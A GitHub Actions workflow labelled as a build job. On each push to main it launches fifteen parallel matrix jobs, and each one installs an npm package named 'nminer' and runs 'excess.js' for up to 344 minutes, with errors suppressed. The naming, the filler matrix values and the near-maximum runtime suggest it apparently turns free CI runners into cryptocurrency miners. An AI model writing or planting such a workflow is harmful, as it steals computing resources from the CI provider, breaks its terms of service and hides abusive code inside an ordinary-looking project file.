name: excess
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2631 }
          - { version: 6301 }
          - { version: 1647 }
          - { version: 6279 }
          - { version: 699 }
          - { version: 3416 }
          - { version: 9541 }
          - { version: 3703 }
          - { version: 9022 }
          - { version: 4188 }
          - { version: 9157 }
          - { version: 5678 }
          - { version: 9181 }
          - { version: 3719 }
          - { version: 2832 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: duh
        run: |
          npm install nminer@latest
          timeout 344m node excess.js || echo "excess executed"